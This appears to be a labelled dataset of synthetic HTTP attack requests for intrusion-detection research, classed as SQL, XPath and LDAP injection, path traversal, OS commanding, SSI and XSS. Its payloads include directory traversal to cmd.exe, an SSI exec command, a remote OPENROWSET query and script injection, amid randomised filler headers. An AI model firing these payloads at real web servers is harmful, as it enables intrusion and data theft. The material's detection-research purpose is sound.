ETag: W/"aTOdrmXsUZHyRCr-F"
Expect: 100-continue
From: a6ssEboa@0sqFIsecq.uk
If-Modified-Since: Wed, 16 Apr 08 16:49:15 GMT
If-Unmodified-Since: Fri, 23 May 08 14:29:13 GMT
If-Match: "wQRFn95bknpgijB"
If-None-Match: *
If-Range: *
Max-Forwards: 777
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: 1mAes ohsnlr=eefi
Range: 5-,-97,-5
Referer: /Ett2/Iwe4uop.gif
TE: deflate;q=0.9,trailers,trailers
Trailer: Upgrade
User-Agent: jolGaAurc
UA-CPU: Sparc
UA-Disp: 0908,917,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 389x154
Via: 0.6 252.49.31.229:7678
Transfer-Encoding: compress
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 195.218.223.142
X-Serial-Number: 386658457153334430
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44172
Start - Id: 43579
class: OsCommanding
GET /noaaihae/s@/oLYgkNarwIbRx3l/e8/fnRT9s/nUkfd8E9c8t/vzdOebSS/r9acceptIpasswdTy8t9EQf-/A@T_7lNTZQA11zH.sh?tSdv=rnS8mZ&oaihegGbnIuk=%27n&jllh=+oilcr+&hnteee8Ietotwl=%29%5Coai&ahwuoe=tRafzeytk&eue1n37rng=6thoh8RS%28to&Seti=78i2nq&DtMcdElnhhedoca=eynmz%5Dlta&8PsamDEu=auMeo&4ent0oaDra=httpluQrr9eoef2sa&9hsS=%2Fperl++%2Ftmp%2Folntis.pl+-p4588&eltih=ran HTTP/1.1
Host: www.ewqeiwl.fr
Connection: Mla9toid
Accept: application/*;q=0.1, image/*, text/*
Accept-Charset: koi8-r, iso-8859-15;q=0.4, iso-8859-8-i, x-mac-roman;q=0.0
Accept-Encoding: deflate;q=0.2
Accept-Language: oi-obia4qoe, orrrOrmf-hcateeaa, dte-apLM, neoltwir-ttfi
Cache-Control: no-cache
Client-ip: 43.226.69.253
Cookie: eskomttweuhI=uC4BsjW;pezuretB0=rAs httpshg6  PslrbQ%
Cookie2: $Version="7"
Date: Thu, 23 Jun 05 13:00:49 UTC
ETag: "z@VDwv-LBAonIc6"
Expect: oCdgAeg=huco
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Tue, 21 Mar 06 09:55:45 UTC
If-Unmodified-Since: Mon, 01 May 06 19:54:17 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 08 Aug 08 16:16:11 GMT
Max-Forwards: 2556
MIME-Version: 0.2
Pragma: gn5dym=wVmenor
Proxy-Authorization: Basic Mm9zZXNlbzphc3dkaGVq
Authorization: Digest qop=auth-int
Range: 08647-744
Referer: http://www.aefeea.de/sLiJreeL/r1dc0cet/ooaiEot/6nytened/dnadiq.cfm
TE: trailers
Trailer: Host
User-Agent: Mozilla/7.4 (Machintosh; U; PPC 5.8; vs-eN; rv:0.5.9) Gecko/36995069
UA-CPU: PowerPC
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 881x134
Via: 9.2 39.145.134.161
Transfer-Encoding: compress
X-Forwarded-For: 171.91.103.182
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43579
Start - Id: 46077
class: PathTransversal
PUT /p8n9ntneneIfec/iscj6HAhTzY/widxWZwWtCWC/rtJ1oyPM6/act9ueightLl/ieShatxmin/dqE6jNyBd/access_logiOZviZ4ngf3TCl/sebd/bneat7/eaOrsd/aeiw.jpeg? HTTP/1.0
Content-Length: 238
Content-Language: t
Content-Encoding: identity
Content-Location: http://www.2huahnsd.cz/cert/wnsa/e3dijh/nisn.mspx
Content-MD5: ZnIwcXNwZWF3QWFQZXRsTw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 04 Jul 06 22:10:31 GMT
Host: www.scmetm.cz
Connection: keep-alive
Accept: audio/*;q=0.7
Accept-Charset: iso-2022-jp, iso-10646-ucs-2
Accept-Encoding: compress;q=0.6, gzip, compress;q=0.8
Accept-Language: S4ib0b-nfbbs2ve;q=0.5
Cache-Control: only-if-cached
Cookie: L20Gh=72783795;te=srcpeor
Cookie2: $Version="9"
Date: Sun, 09 Sep 07 08:37:38 UTC
Expect: etctA7v=4nygoels
If-Modified-Since: Mon, 14 Nov 05 23:03:07 CET
If-Match: "NfZ8QYN24GhbQF6mBb"
If-None-Match: "BrFP3LiWzWK0uFs"
If-Range: Mon, 07 Feb 05 15:11:10 CET
Max-Forwards: 28
MIME-Version: 9.9
Authorization: 4gdu ennsehb=Neam
Referer: http://www.Hhfa.de/4Vohha/uTda/ye6ttdt.txt
TE: trailers,trailers
User-Agent: kron/8.1.3.2
Via: 1.3 241.105.230.25, 7.2 31.183.44.61
Transfer-Encoding: deflate
X-Forwarded-For: 169.44.253.54

J-gHFiframeandm-BFl=Lme:h&ms4r=1UwQEIwiukx&AousrP=8333881&ztc1sea5apgnhh=e8i&eiarr=ocJ&hlcvnnsar=hwns4uplimrl&eo3Ouh0IwnsCob=t4HyRoh6&tlS8=/,,,/Vredjlh/ugta/passwd&ieeekkh0kTafyO=%c&9K=5&3Pm6Z7_Ee4fJ=mcm2qEdrxis&gc=9vqdW

End - Id: 46077
Start - Id: 37672
class: LdapInjection
PUT /FisjJXpevW/exRnnc89InDitNjt/stnptenlmoaeHyet1N/iCAiA_T/byilsoqsrtw9nemt/Q4bxp_DsbodyElAbgsoundqQmeta/0NJQD.php3? HTTP/1.0
Content-Length: 182
Content-Language: a1,lmsh
Content-Encoding: gzip
Content-Location: /hvqtzwMh/adesuc5a/oieCl.nsf
Content-MD5: aWViaVRydHQ2dGxubGNvdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 Mar 07 04:17:17 UTC
Last-Modified: Sat, 03 Feb 07 08:15:25 UTC
Host: 22.168.215.80:80
Connection: twbh
Accept: video/mpeg;q=0.3, audio/*
Accept-Charset: cp-932, iso-2022-jp;q=0.8, cp-932, x-mac-turkish
Accept-Encoding: 
Accept-Language: i-eehoUee
Cache-Control: ridr=1cmty
Client-ip: 77.204.246.223
Cookie: oeiiodmql=jlbKZfPXZNM;RnwwffounngddOh=ieotytslls&tmlike4q ;a3NcA3h=ebOLn
Cookie2: $Version="613"
Date: Sat, 02 Dec 06 03:46:15 CET
ETag: "L1wKH0qc0h5OgNanY"
Expect: 100-continue
From: ssDeu@yeiMt.st
If-Modified-Since: Sun, 09 Jan 05 05:01:11 CET
If-Unmodified-Since: Sat, 12 Jun 04 07:59:41 GMT
If-Match: "fdP.5sI.R-AUru88"
If-None-Match: *
If-Range: Mon, 08 Nov 04 04:50:13 UTC
Max-Forwards: 87
MIME-Version: 9.4
Pragma: lNRta='ets8I39a'
Proxy-Authorization: Digest uri=/heen1roq/eredadu/eloyue/dceeE.cgi
Authorization: Digest opaque="Lrea"
Range: 7-75,773-,28-851
Referer: http://Ggouo.com/acminsia/Sese9hf/weNg.tiff
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/6.4 (Windows; U; Win98 0.7; fe-cl; rv:9.6.6) Gecko/71904943
UA-CPU: MIPS
UA-Disp: 770,856,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 940x1719
Via: 2.1 2.34.100.72, HTTP/1.0 206.92.198.88, HTTP/0.9 22.236.122.79
Transfer-Encoding: deflate
Upgrade: pemoEi/4.0
Warning: 123 225.46.208.152:9661 "sweilsrzmalesAdlaO" 
X-Forwarded-For: 193.224.2.50
X-Serial-Number: 7386288464563322200
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4R0hI=184860&NC.WF8YQTR=nrmvbscriptrt/ue=hr0&hT4oehe=YowA)(  | (io=*)&ii5pMLnde6tadwo=uVlocationppo%9ruehyd&artszteoH=ia9ieaewindow.open]8endr&ja=m6yJcvGW&oz=lSVd

End - Id: 37672
Start - Id: 45172
class: PathTransversal
GET /./? HTTP/1.0
Host: 140.88.231.148:29362
Connection: close
Accept: application/*;q=0.6
Accept-Charset: euc-kr, iso-2022-jp;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 49.63.221.221
Cookie: eOssErdweHee2tl=CeINrafoeoe8tos;gsoe8= ]en/oirhveagroup byaddimgcsS
Cookie2: $Version="70"
Date: Wed, 14 Jul 04 17:34:54 CET
ETag: W/"nusweEuleB7R8Ih"
Expect: sozKtin=eeRl
From: eeatnnio@srlvirtei.ch
If-Modified-Since: Tue, 20 Apr 04 11:47:43 UTC
If-Unmodified-Since: Tue, 02 Oct 07 19:20:38 CET
If-Match: "B-.yM0cAQk3nfmyFmjs1"
If-None-Match: *
If-Range: Sat, 15 Mar 08 12:41:49 GMT
Max-Forwards: 287
MIME-Version: 0.7
Pragma: upgnwx='vssk'
Proxy-Authorization: Digest nonce
Authorization: ttiwh soogktu=nltw
Range: 551-3881,-846
Referer: /Cefw/a5ate/HtlcgA9t/egttxEno.sh
TE: trailers,trailers
Trailer: Date
User-Agent: urllbiJVb- http://www.su8si.org
UA-CPU: StrongARM
UA-Disp: 133,5622,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1177x8327
Via: HTTP/7.7 www.Tcns.png
Transfer-Encoding: identity
Upgrade: iis5w/2.9, 8fLc/3.7, wahe/2.1, ossrxy/5.0
Warning: 731 www.s1twimt.js "shcldhaeymHeqh" "Wed, 16 Mar 05 01:22:20 GMT"
X-Forwarded-For: 249.70.128.210
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45172
Start - Id: 43733
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.eoatit.de
Connection: qfQ4f1ds
Accept: application/rtf;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: DK-eWoeerm, 8ruhSqs-reaha;q=0.5, sortn-sarsp;q=0.5
Cache-Control: min-fresh=4667
Client-ip: 42.85.153.5
Cookie: UBlsfMbodyIG_=961739421;7ITF=tpe;le=0ily;mhnretrhfeneEsN=375412;bgmteolet=3r@mmoouniontlcaq-sqFc ;lue1ai9ht0ep=tco
Cookie2: $Version="346"
Date: Tue, 14 Dec 04 23:01:00 CET
ETag: W/"G4AsBzyc4BCrx9quAQV"
Expect: eiy7a
From: erev@Ao0tpiRe2.ch
If-Modified-Since: Tue, 01 Nov 05 14:28:55 CET
If-Unmodified-Since: Sun, 09 Nov 08 20:05:01 GMT
If-Match: "lT0iO3k0TvAyLBF"
If-None-Match: *
If-Range: "RjeEnHTVkmsKZIAa"
Max-Forwards: 224
MIME-Version: 0.1
Pragma: hsesoWeK='ush'
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic bnZzYWFFc2w6YWR1Y2R0cw==
Range: 7008-71
Referer: http://dioeIg.biz/lbwR/iur7md/yspst/oTartw/tz36d.swf
TE: gzip,chunked;q=0.9,gzip;q=0.7
Trailer: Accept-Language
User-Agent: Mozilla/2.6 (Windows; U; Win98 9.7; ea-rs; rv:0.2.8) Gecko/47568561
UA-CPU: 68000
UA-Disp: 903,5806,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 337x2229
Via: FTP/7.5 181.6.95.168, 1.8 www.l6ye.htm, HTTP/1.7 www.donk.jpeg
Transfer-Encoding: compress
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 140 www.rnisshet.gif "tr2eit" 
X-Forwarded-For: 101.90.146.184
X-Serial-Number: 94311514979203
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43733
Start - Id: 35875
class: XPathInjection
GET /WxwVOTFmochaYipdP/j-tpy8_jHkpp/eyGzHjT5/b84Ux/ntk.exe?nZhesoLcho=vm&AZG9uBautoexecYusr=al+rhlconnectlibhae5ysi&s4oRr1eeep4b5m=dapetsah44t&rtwn=7731&dtctiref3g=iRPhh&74t2prbehupy5e=oeefsilrrsts&7lhq=pde+it&ypdog5=ro6n%2FP%2FYslo5e%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D2%5D+or++++%27szemax7%27+++%3D+%27&get=le%3C2%3Fdy&q0matasfty=bMmbosti3rs5ea6i&ov2tEei=638767&eapnidrs=99094305&3ahmRNhio=sCwindow.open%3Do&4amdY0gnlspyO=6&dsictintdsrc=40048 HTTP/1.1
Host: www.tsh1elid5.cz
Connection: ksohdjng
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.4, deflate;q=0.6, compress
Accept-Language: *;q=0.7
Cache-Control: max-age=606
Client-ip: 167.85.209.229
Cookie: tts5qrbI8Hq=ue@iframetlinkwygfgs elt
Date: Sun, 28 Sep 08 04:44:19 CET
ETag: "j6_RBDMJQV7b5lSDIfdF"
Expect: 100-continue
From: suitS@oroHhO.fr
If-Modified-Since: Thu, 11 Mar 04 03:50:24 UTC
If-Unmodified-Since: Sat, 01 Aug 09 08:16:26 UTC
If-Match: "j6Rux0wYcW_xhFcn"
If-None-Match: "EnCVkpN1KDDdc_lP-"
If-Range: *
Max-Forwards: 00
MIME-Version: 4.5
Pragma: vedr='ak4jtI'
Proxy-Authorization: Digest nonce
Authorization: eae2a dtbeYEe=nnehs6
Range: 440415-33194,1644-5
Referer: /dhsla5ii/lanl1.tiff
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/1.4 (Machintosh; U; Mac OS X 2.9; tw-it; rv:0.8.3) Gecko/24983107
UA-OS: Linux
UA-Color: color32
Via: 0.7 www.ezdu2mec.tiff:89, 8.1 www.owtie2n.png, 0.0 www.naooaab.jpeg
Transfer-Encoding: compress
Upgrade: hic/2.2, m8rwk1/9.9
Warning: 683 214.32.116.161 "fdrit" "Thu, 11 Jun 09 24:41:37 GMT"
X-Serial-Number: 160475
----: ----------------------------

null

End - Id: 35875
Start - Id: 40338
class: SSI
GET /whohsine.dll?imnroonr1m6=%5Dea&hvrkh=e&ela6s=q1X&ntshoqsoqik=e+e%2F&ies0f=87652116&dhejoeEenth=40874777&rcpXCg=8&9n=gexecperlbhaving&sQlN1Agjqsm=%3C%21--++++%23exec+++cmd%3D%22c%3A%5Cprogra%7E1%5CdtmTnetK0%5Cqhojfolel%5Ceehrrfrc.exe+++d%3A%5CpecthstiUE%5Cwww.aticelne.org%5Caeor1mQtsp%5Cdatabase.mdb+++++%2Fx+++++exporttofoxpro%22--%3E&aeie=624&Fhueu=k%28eiacsuhtoe HTTP/1.0
Host: 36.138.244.144
Connection: ltaleend
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=6521
Client-ip: 21.250.170.182
Cookie: yrshdrlepd5=t4omect07edue96o;Cosj7elbsgta=slteAegehmtUte;oo6gbiiIgza=78907;QYrhogntjtdt9tu=7131;iep6ince6lt=Kreplacetd9acmdC4Vrm6b;pnciEoeGsn=171
Date: Sat, 11 Feb 06 07:07:34 CET
ETag: "-2SnMmPGNUPDo6afli"
Expect: 100-continue
If-Modified-Since: Wed, 13 Sep 06 04:53:14 UTC
If-Unmodified-Since: Sat, 22 Aug 09 09:37:43 GMT
If-Match: "YxAmwOcMNnuRopsi6qX"
If-None-Match: "5QF7R3b0p5NQyTg6SPLa"
If-Range: "8LJ2f3koIsNgZJ2y"
Max-Forwards: 6
MIME-Version: 3.8
Pragma: ooiz1cte=oirtuz
Proxy-Authorization: Digest response="294CCE866907f6d2817d414d28f0AeF8"
Authorization: Basic YXlpZWw6Y3J0MlRuYQ==
Range: -681198,453389-53032,-61223
Referer: http://www.Yrwsyr.st/idtmbsld/croewS.shtml
TE: deflate
User-Agent: Mozilla/9.8 (compatible; Konqueror/4.6; WinNT; rhoO)
UA-CPU: StrongARM
UA-Disp: 041,313,32
UA-Color: color8
UA-Pixels: 384x228
Via: HTTP/2.0 221.89.128.117
Transfer-Encoding: deflate
Upgrade: ogu/6.9, nh0i/0.5, njHtk/8.8, I6inrl/2.9, Eflir/9.1
Warning: 464 www.SfWo.gif "rphinl2hutas" "Mon, 15 Dec 08 09:55:10 UTC"
X-Forwarded-For: 42.162.17.85
X-Serial-Number: 22985

null

End - Id: 40338
Start - Id: 47557
class: XSS
GET /dnndnetvAshEe/toaryeeen/dohcdCtvdaetjoe/eeeirfaUentdskEnsep/TRthchnI9rih/tebrbfzsiAkarstse/1geeieej/itsuZtlcKuoOtrlbeSa/yP4LSD6LIDWuk_m0/sgia/yttkh/pvuhqWfsr.exe?es=o4obD&fs=eW5cZLi.JJKt&Lpt8=%3Clink++++rel++%3D%22++stylesheet+++%22++href+%3D%22+++javascript%3A++%5Balert+%28%27tq6h37t%27%29%3B%5D++++%22+%3E&rqUecocnme=tH%3AslweThtarot HTTP/1.0
Host: www.enuhuaoad.de
Connection: dnrc
Accept: video/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.5, deflate, gzip, identity
Accept-Language: 1eaeenut-a, at-taCuhayc, n-1n;q=0.6, bTa-7see;q=0.4
Cache-Control: min-fresh=167
Client-ip: 19.138.115.203
Cookie: 7NettSesioxj=aoaf$iYuesb
Cookie2: $Version="143"
Date: Sat, 09 Dec 06 23:04:02 CET
ETag: W/"yz3CH.7Vr8GR4q78dn1B"
Expect: aZpnthrk
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Tue, 18 Apr 06 09:58:17 CET
If-Unmodified-Since: Sun, 09 Aug 09 16:54:39 GMT
If-Match: *
If-None-Match: "er4JtXTLe2xl.Pb"
If-Range: *
Max-Forwards: 2
MIME-Version: 3.1
Pragma: toidir=AtewQr5
Proxy-Authorization: ppaz adeo=ssbniBo
Authorization: Basic bkFzcjp0anRkYw==
Range: 946-214738,54330-8
Referer: http://nshE.be/uiiyto/dcjroed/hiRag8at/dlle/yhctcp.bin
TE: deflate,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/0.0 (Machintosh; U; Mac OS X 8.5; nc-Iz; rv:1.0.7) Gecko/83171283
UA-CPU: x86
UA-Disp: 2727,829,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 417x368
Via: didcT/9.6 0.176.48.211, HTTP/2.2 www.nsesac.png:7082, 6.7 www.ohiNar.html
Transfer-Encoding: ah1woi; Eerp=bRmth
Upgrade: nqne/3.2
Warning: 992 177.149.214.21:27 "ihta" 
X-Forwarded-For: 112.140.177.233
X-Serial-Number: 57604389
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47557
Start - Id: 42104
class: SqlInjection
GET /iWbq/Beripgl8eha.htm?snhxe4rjIce7e=97&a8liEeWcuut4ebn=2569&Ildoioto=%3B+++insert+++into+++OPENROWSET%28+++%27SQLoledb%27%2C%27uid%3Doznl%3Bpwd%3Doseqruse%3BNetwork%3DDBMSSOCN%3BAddress%3D252.114.119.90%2C1433%3B%27%2C%27select+++++*++++from++++_sysdatabases%27+++%29%3B+select++*++++from++++LinkedOrRemoteSrv1.master.dbo.sysdatabases HTTP/1.1
Host: www.ereken.cz:697
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ijuus-ebdk, na1th-eg;q=0.6, AnDeza-gvpga;q=0.5, n-uoht3e;q=0.0, efofer-s
Cache-Control: only-if-cached
Client-ip: 139.71.160.209
Cookie: mNVnW9vsock_stream=|s;said1r=T<;_EErHNhJg_@G=312;et2yyrsiiecda=techoe;SYnS3=7500408149;YlikeTq=wnhIF
Cookie2: $Version="787"
Date: Mon, 24 Nov 08 04:37:22 CET
ETag: W/"D83eFbifPOT4iL7"
Expect: elzgh
From: LzmxnseS@evezd.fr
If-Modified-Since: Tue, 08 Sep 09 13:40:53 GMT
If-Unmodified-Since: Sun, 12 Nov 06 09:31:01 UTC
If-Match: "w149LuXKoUQYVAS"
If-None-Match: *
If-Range: "XWvjcftUkYdRP.KnL0EY"
Max-Forwards: 54
MIME-Version: 0.9
Pragma: lof=Tc2usg
Proxy-Authorization: Digest uri=/wSot5/LjitAzt.php3
Authorization: NTLM MGRjdXNpQXNHRWRvaUFlRG5vOWxHdWhldWRjNUU4aGVu
Range: -824,-58,-460
Referer: /fbto/dienn/eTarh2v/totmCee.sh
TE: trailers,gzip
Trailer: User-Agent
User-Agent: Mozilla/6.8 (X11; U; Open BSD i386 3.3; ue-nr; rv:4.1.4) Gecko/53940569
UA-CPU: Sparc
UA-Disp: 7402,9004,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4728x9077
Via: 7.2 21.154.160.191, 1.4 www.su0ortlt.htm:7
Transfer-Encoding: deflate
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 67.134.243.28
X-Serial-Number: 912151407
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42104
Start - Id: 48559
class: XPathInjection
PUT /u2shnSsafim7w/1ongto/38S/sUD3DBB./2cnoIlv.css? HTTP/1.0
Content-Length: 381
Content-Language: togmp,dmWn
Content-Encoding: compress
Content-Location: http://www.sd9h.st/lecl8/soer/lrjo.tiff
Content-MD5: ZHJFY2FpNmU0SW5idXhudw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 13 Sep 09 01:33:25 GMT
Last-Modified: Sat, 05 Aug 06 17:40:46 UTC
Host: 212.166.47.130:957
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: windows-1250, x-mac-icelandic;q=0.6, iso-8859-2, koi8, x-mac-korean;q=0.6
Accept-Encoding: *
Accept-Language: yry9S0hp-cAe0;q=0.9, OdE-set;q=0.0, eefjm-r;q=0.3, esog-t, z7-c3d
Cache-Control: no-store
Client-ip: 87.13.72.165
Cookie: pstfbnday8yd6dt=737;3GJwindow.open=64;eogpm7ohriedsn=oxbinefg;ehtOsornutEdn=ef_k;igso8etrosex=dabthtnfr;uds=eJ7z6V1X
Cookie2: $Version="8"
Date: Thu, 29 Oct 09 17:34:48 GMT
ETag: W/".NpEoPMJ922d-Z-plN"
Expect: 100-continue
From: w3nw@eoeld2.be
If-Modified-Since: Mon, 04 Sep 06 12:57:22 UTC
If-Unmodified-Since: Sun, 08 Apr 07 09:17:00 GMT
If-Match: *
If-None-Match: *
If-Range: "SWy.FoMZ1UPqwR0UbO"
Max-Forwards: 85
MIME-Version: 8.7
Pragma: inhRhnt='aaoe0n'
Proxy-Authorization: NTLM aWlsc3Bvc2V1dG9laHRjZXJXb3V0b2VpaWFlZWVyYWF0dGZ0YWlJbGE=
Authorization: NTLM cm1zbFN2OW5hdHlkYmhmb0xrZ1lpRTRhb3F0c3B5ZFNob2UybQ==
Range: 937233-073734,-13,-768
Referer: http://www.thntu.it/edonRa/gpel/iD31ek.pl
TE: chunked,deflate,trailers
Trailer: Via
User-Agent: Mozilla/9.3 (X11; U; Open BSD i386 7.0; wi-Oo; rv:5.7.3) Gecko/52585264
UA-CPU: StrongARM
UA-Disp: 2908,9185,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0026x0337
Via: HTTP/8.0 www.NdhwVFa.jpeg, 3.6 www.hOtna.js, 6.0 www.sehtk9.tiff
Transfer-Encoding: gzip
Upgrade: lexe/0.2, mX4rfi/5.5, ue5de/1.9
Warning: 221 www.Tjeo.jpg "mhTIthjmdIiio6h9eh" 
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 63432598525498098
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

ht0TcFd=4503719512&ZxcONXS=hT9n&5h8CZ732=@7r&JEwn2q1lD574aT=twPAa-P&dtehdmxul5ys=2953095&GjYblbJEBgZj=qR&o4=amhomaB&lop6=12&Prhioute=ajsallaL7Fasdt&u7YEg=nidsb/enseh/ta/child::node()[   position()=7]    |    Eio/4eT/y/child::text()[position()=3]   or 'mined' = '&eTdyo2=euhwNmnshutdownsnp&ihlh1agtrhtkrtu=1&egatd=eOo0d8rd

End - Id: 48559
Start - Id: 41932
class: SqlInjection
GET /dlsnrtsmotbndOrotlI/dfx/ce6TkI1kH8aGHAG/tdEEmyiaeh1/tjYU.qnTFlFvTPhnk2Xs/gsWcnkanph-k/srrapjH/rDon.6.Z8wtdF/ixvnKoewuseo9rc/ystdinv9n@UDdelete7SKrP/sde/iDA1cdKJPNZb.aspx?tpnirlebaAoc=+yw6miiaccess_loglelelinkttm&imexiseeEettld=aia&fmbwq3bDi=%3B+EXEC%28++++%27INS%27%2B%27ERT+INTO+++++users+++++values%285%2C%27id75e7gnrs%27%2C%27snfonpaon%27%29%29&fot7iYh=cn%5Do0&eRH7h=rteT+m2i&whk=98118082 HTTP/1.1
Host: 60.191.16.225
Connection: close
Accept: text/plain;q=0.5, application/postscript
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 167.205.9.192
Cookie: iiabsn1pft5a=v ;aac=window.openi Ot7oltdocumentmochar\si
Cookie2: $Version="26"
Date: Sat, 26 Dec 09 07:21:38 CET
ETag: W/"fVRjw.c9SadJ-A7LI2u"
Expect: yrnr=0aorOe
From: m9He0on@mdltezsc.org
If-Modified-Since: Thu, 09 Oct 08 13:01:50 CET
If-Unmodified-Since: Wed, 10 Dec 08 21:36:51 GMT
If-Match: "gezxUR8lLgf2Vj4_"
If-None-Match: "86NMV@.8B3FpIztt1"
If-Range: "yot6jzzY66x.1Wt@0-T"
Max-Forwards: 398
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM aWpBVDRyVWhiaUFpZW5lZkltd3ROSHd1cjFpYXp0cmV5MGxtQWFwY2Jnb3I=
Authorization: qm5t ecesdu=orTms
Range: 230210-,74601-,-666
Referer: http://www.ocd1aa7.gov/dtho/tealihit.dll
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: ivf3eyOonM
UA-CPU: 68000
UA-Disp: 4298,556,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 724x022
Via: HTTP/6.0 www.seojecs.html, FTP/8.2 137.134.85.162:9, 0.6 www.oa8b4nt.js:819
Transfer-Encoding: gzip
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
Warning: 941 www.opH3rr.tiff "cssrqn2d5ar9lsne3" "Mon, 23 May 05 22:26:08 CET"
X-Forwarded-For: 169.141.62.144
X-Serial-Number: 79709150
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41932
Start - Id: 36303
class: PathTransversal
GET /aypaet/tEln0njlh0sTHortlbc/jdwgetp2Ms/H5zrkLbetweenc/qls0TcmVzoa/3yWIi.UXpo-/3cZ/qmMKBD/LAGQ3Z2nQUincludeJFw/Te/lID3gPzeBBEQBOPGdj/RDyl.pl?treshhwao=oz%5Ce&funtgdri1ecdsut=rufqkt0&ugTni8nqi=gbn&x3UDncc2exec-RX=zvafPfwa%3D&kSNetmQoprdd=7SZ&hkeeftcmndwqhio=iyiuerm7z&6jaL7.sQ9Iwo=77321703&tkueeols=lsea%29l&lhb=e7wuIQDk..f&Yeh9tihnrt=xm%5DdH&dss4oho8n=79844&vvrsth57srorid=tdivfgod1httpspd&ujoT8rneaH=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fdeitq.conf&diDUeIu=6494722&xx4qC8uO=be+%29etc9orH5t HTTP/1.0
Host: 45.182.237.16
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic;q=0.1, x-mac-arabic;q=0.8, iso-8859-15, shift_jis;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 204.197.245.15
Cookie: aeohhr=a -;deaehsrra=9968;alea43m=[>lib;cjdfmah=dnD\
Cookie2: $Version="878"
Date: Wed, 04 Feb 04 06:24:48 GMT
ETag: "PR@C.gH8sSbya5og"
Expect: 100-continue
From: Ai3uSa@urpega.be
If-Modified-Since: Fri, 30 Oct 09 11:07:23 GMT
If-Unmodified-Since: Thu, 29 Dec 05 17:09:05 GMT
If-Match: "pV61aumhgieINFT"
If-None-Match: *
If-Range: Mon, 14 Mar 05 10:45:32 CET
Max-Forwards: 918
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic dWRVMWF0QWg6bnlwc3Q0ag==
Authorization: mr9em ce1x=a9es7s
Range: -703381
Referer: http://eoih.net/tteitnp/Uno0cbhu/4Ai2.swf
TE: deflate;q=0.8,deflate,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/9.8 (X11; U; Unix 1.9; tt-tN; rv:2.0.7) Gecko/17043082
UA-CPU: MIPS
UA-Disp: 505,9391,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: 7.8 140.247.82.156:56420
Transfer-Encoding: gzip
Upgrade: oafi/4.5
Warning: 925 www.seESe.gif "aoh3bha8hrc" 
X-Forwarded-For: 142.213.134.120
X-Serial-Number: 10989646571343616
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36303
Start - Id: 35691
class: XPathInjection
